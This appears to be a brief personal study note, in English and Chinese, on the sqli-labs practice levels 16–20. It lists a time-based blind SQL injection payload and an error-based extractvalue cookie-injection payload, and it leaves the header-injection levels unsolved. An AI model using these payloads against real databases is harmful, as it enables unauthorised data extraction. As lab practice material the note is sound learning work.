Basic Injection
Less-16 Blind-Time Based-Double quotes-String
正确直接登录,错误延迟5秒。
payload:uname=admin") and if(ascii(substr(database(),1,1))>114,1,sleep(5))
Less-17 Update Query-Error based-String
uname无法注入,passwd注入
Less-18 Header Injection- Error Based- string
怎么注怎么出不来 网上查了一下也不行,后面再补吧
Less-19 Header Injection- Referer- Error Based- string
怎么注怎么出不来 网上查了一下也不行,后面再补吧
Less-20 Cookie Injection- Error Based- string
这里是cookie注入,修改cookie的参数
payload:uname='and extractvalue(0x7e,concat(0x7e,database(),0x7e))#